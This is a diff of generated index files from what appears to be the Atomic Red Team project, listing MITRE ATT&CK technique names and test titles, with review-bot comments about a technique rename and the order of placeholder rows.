+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071 Application Layer Protocol](../../T1071/T1071.md)
@@ -1293,7 +1302,7 @@
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
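Review bot: this hunk renames T1001.003 from `Protocol Impersonation` to `Protocol or Service Impersonation`; make sure the same rename lands in the CSV index and matrix files regenerated in this PR, otherwise the markdown index and the CSV will disagree on the technique name for the same ID.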
@@ -1898,10 +1907,12 @@
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
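Review bot: the two new T1496 placeholders are inserted five lines apart, `T1496.002 Bandwidth Hijacking` after T1491 Defacement and `T1496.001 Compute Hijacking` after the T1491.001 Internal Defacement tests, with .002 before .001. If the generator deliberately follows the upstream data order that is acceptable, but a reader scanning for T1496 will miss one of them; consider sorting placeholder rows within a tactic section by technique ID.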
diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md
index 041c8286b1..c60d9e23e7 100644
--- a/atomics/Indexes/Matrices/linux-matrix.md
+++ b/atomics/Indexes/Matrices/linux-matrix.md
@@ -2,47 +2,49 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
-| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
-| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
-| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
